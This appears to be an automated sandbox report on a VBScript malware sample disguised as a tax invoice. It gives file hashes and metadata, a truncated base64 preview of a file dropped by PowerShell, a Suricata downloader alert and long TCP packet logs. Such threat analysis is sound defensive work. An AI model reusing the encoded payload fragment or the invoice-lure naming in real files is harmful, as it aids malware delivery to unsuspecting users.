                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Roaming\Forsvarsundtagelsen.Non

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):478500
                                              Entropy (8bit):5.96523336884218
                                              Encrypted:false
                                              SSDEEP:12288:nrobBBwZktGmWzVBcYnY4lYQyLq8HRYHCHEpqLuY3:MbBF4NVBcYozpYikpqaY3
                                              MD5:0F0C12D345508D8F65C3A877C4E3E3EC
                                              SHA1:502F251AA8F322F6F7188C83893F1B3BC2E38676
                                              SHA-256:718B2422AA646CF870C7BF057A9B5D753CB2C6C12EE94C1246B425C9EB61BD5B
                                              SHA-512:B9B0E97E5A88D0B46913E2F9771CC248727F8CD52B3D7D53679212DCFC6362E3C4B52A5C48EC7BABD813BA44BB3CA81C4497D675BE6172112E97083784F247BC
                                              Malicious:false
                                              Preview:cQGb6wJF2rvA6hYAcQGb6wJkhwNcJARxAZtxAZu5XJM8O3EBm3EBm4HBQbBY2OsCZzvrAjztgemdQ5UTcQGb6wJ92XEBm3EBm7ot/7u/6wKsDesCMQtxAZvrAlL5McpxAZtxAZuJFAtxAZtxAZvR4nEBm+sCw7ODwQTrAubLcQGbgfkACFECfM3rAsZa6wKPyItEJATrAj8c6wJ/jYnDcQGbcQGbgcNSR3UAcQGb6wJ90LqQ/2nF6wKhD+sCXFKB8j16fKTrAiCS6wLwlYHyrYUVYXEBm+sCzWpxAZvrAv0UcQGb6wK/j4sMEOsCHsrrArIViQwT6wLIOXEBm0LrAselcQGbgfpk/wQAddTrAv6ncQGbiVwkDOsCV8PrAr+Gge0AAwAAcQGbcQGbi1QkCOsCN0NxAZuLfCQEcQGb6wK6RYnrcQGbcQGbgcOcAAAAcQGb6wJdM1PrAscccQGbakBxAZtxAZuJ63EBm3EBm8eDAAEAAAAAawLrAic3cQGbgcMAAQAAcQGbcQGbU+sChnvrAlHwietxAZtxAZuJuwQBAADrAhb86wIPEYHDBAEAAHEBm3EBm1NxAZtxAZtq/3EBm+sC5eeDwgXrAtnM6wIkPjH26wJ0kusClvcxyXEBm+sCEFyLGusCOvlxAZtB6wKnnnEBmzkcCnXz6wJme3EBm0ZxAZvrAu56gHwK+7h13esClkzrAsiIi0QK/OsCS9jrAotOKfBxAZtxAZv/0usCmj3rAp9oumT/BABxAZvrAqS+McBxAZtxAZuLfCQM6wLSQ3EBm4E0Bz/aLc5xAZtxAZuDwATrAmcOcQGbOdB15esCegNxAZuJ++sCbNpxAZv/13EBm+sCgCi7PKkeuz2kK/if4a3vBUZPShaHwckzrKPzovBF31tAAm4lsG9zJWACSiBLS/6PpCuGadho8FvchMBYKk/OkjsPrlvcZyM/dKgGEBUd+J4gzrWciti6Eqy6MtpKiup2FAa+riDO

                                              Static File Info

                                              General

                                              File type:ASCII text, with CRLF line terminators
                                              Entropy (8bit):4.750742346573816
                                              TrID:
                                              • Visual Basic Script (13500/0) 100.00%
                                              File name:NTS_eTaxInvoice.html.vbs
                                              File size:84'516 bytes
                                              MD5:a1aeb49d80b16158b4b88efef30be753
                                              SHA1:a7829f01f6a679b9016c1b192431a317827045b1
                                              SHA256:adae16c4fe643a3093a6e2ac5329616ccc62d71725f208203869d90f08b3c6d1
                                              SHA512:a15fcfb783b0c8225478f3015a704370f794a59a827e48d32bf537ca27a8cb2a30922278b65475b52f3f0990a5c6d38fca281cf3b3ac44eef92bea1d0811f5a3
                                              SSDEEP:1536:s+aCJtE0IliA2cngEAwsi0+lyOFY+UoArilnO7Mu5FYLf:s+aCrpADnWklyOZUoJlnsQLf
                                              TLSH:3A835D18D5B827F50D6A8E99BFC9453784B84C340D35B8BCE5C9078E30B1898DAFBB94
                                              File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi

                                              File Icon

                                              Icon Hash:68d69b8f86ab9a86

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-30T09:58:01.808212+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549733172.217.16.206443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 30, 2024 09:57:20.813616037 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:20.813689947 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:20.813817024 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:20.821357965 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:20.821378946 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:21.473547935 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:21.473628044 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:21.474323988 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:21.474385023 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:21.476423025 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:21.476438046 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:21.476741076 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:21.486393929 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:21.531414032 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:21.859468937 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:21.859541893 CEST44349726172.217.18.14192.168.2.5
                                              Sep 30, 2024 09:57:21.859622955 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:21.863724947 CEST49726443192.168.2.5172.217.18.14
                                              Sep 30, 2024 09:57:21.874192953 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:21.874233961 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:21.874377966 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:21.874614954 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:21.874629974 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:22.507838964 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:22.508013964 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:22.509733915 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:22.509751081 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:22.509999037 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:22.510996103 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:22.555414915 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.198174953 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.198303938 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.204086065 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.204184055 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.216816902 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.216876030 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.216887951 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.223048925 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.223098040 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.223107100 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.270284891 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.285388947 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.285474062 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.285515070 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.285526991 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.287755013 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.287810087 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.287818909 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.294562101 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.294608116 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.294616938 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.300368071 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.300414085 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.300421953 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.306318998 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.306385040 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.306394100 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.312675953 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.312808037 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.312818050 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.319417953 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.319466114 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.319474936 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.325431108 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.325491905 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.325499058 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.331006050 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.331057072 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.331070900 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.336751938 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.336818933 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.336833000 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.343333960 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.343377113 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.343389988 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.350917101 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.350976944 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.350991011 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.373142004 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.373198986 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.373230934 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.373255014 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.373272896 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.373294115 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.373502970 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.373554945 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.373563051 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.375361919 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.375412941 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.375421047 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.380757093 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.380844116 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.380853891 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.385188103 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.385265112 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.385277987 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.391923904 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.391992092 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.392004013 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.396783113 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.396833897 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.396841049 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.401925087 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.402012110 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.402020931 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.405807018 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.405868053 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.405878067 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.409997940 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.410057068 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.410065889 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.414621115 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.414669991 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.414680958 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.419266939 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.419328928 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.419338942 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.426337004 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.426417112 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.426428080 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.429845095 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.429919004 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.429928064 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.432986975 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.433043957 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.433053970 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.437097073 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.437150002 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.437165976 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.441725969 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.441757917 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.441817999 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.441832066 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.441871881 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.446947098 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.450246096 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.450289965 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.450301886 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.450310946 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.450344086 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.454008102 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.457978010 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.458055973 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.458066940 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.461133003 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.461209059 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.461219072 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.464711905 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.464765072 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.464795113 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.464811087 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.464848995 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.468381882 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.470459938 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.470523119 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.470535994 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.472908974 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.472949982 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.472971916 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.472982883 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.473021984 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.475207090 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.477742910 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.477776051 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.477802992 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.477813005 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.477850914 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.479759932 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.481472969 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.481533051 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.481543064 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.483562946 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.483598948 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.483625889 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.483640909 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.483679056 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.485771894 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.487550020 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.487581015 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.487617016 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.487627983 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.487668991 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.490541935 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.492177963 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.492228031 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.492238998 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.494422913 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.494492054 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.494501114 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.496570110 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.496627092 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.496634960 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.498759985 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.498791933 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.498807907 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.498816967 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.498852968 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.500909090 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.503001928 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.503036976 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.503055096 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.503062963 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.503098011 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.505248070 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.507206917 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.507239103 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.507257938 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.507267952 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.507307053 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.509283066 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.511204958 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.511269093 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.511277914 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.513221025 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.513273954 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.513282061 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.513396978 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.513446093 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.513453007 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.515516996 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.515588999 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.515598059 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.517482996 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.517540932 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.517549038 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.519469023 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.519522905 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.519531012 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.521462917 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.521517038 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.521524906 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.522926092 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.522975922 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.522984028 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.525876999 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.525929928 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.525938988 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.527362108 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.527412891 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.527420998 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.529418945 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.529473066 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.529479980 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.531244993 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.531318903 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.531327963 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.533170938 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.533221960 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.533229113 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.535866976 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.535950899 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.535959005 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.536853075 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.536904097 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.536912918 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.538949013 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.539006948 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.539016962 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.540637970 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.540694952 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.540702105 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.542570114 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.542628050 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.542635918 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.544559002 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.544616938 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.544625998 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.546247959 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.546305895 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.546315908 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.547843933 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.547899008 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.547907114 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.549686909 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.549757957 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.549767017 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.551352978 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.551408052 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.551417112 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.553045034 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.553109884 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.553119898 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.554847956 CEST44349727142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:57:25.554913044 CEST49727443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:57:25.554922104 CEST44349727142.250.186.33192.168.2.5
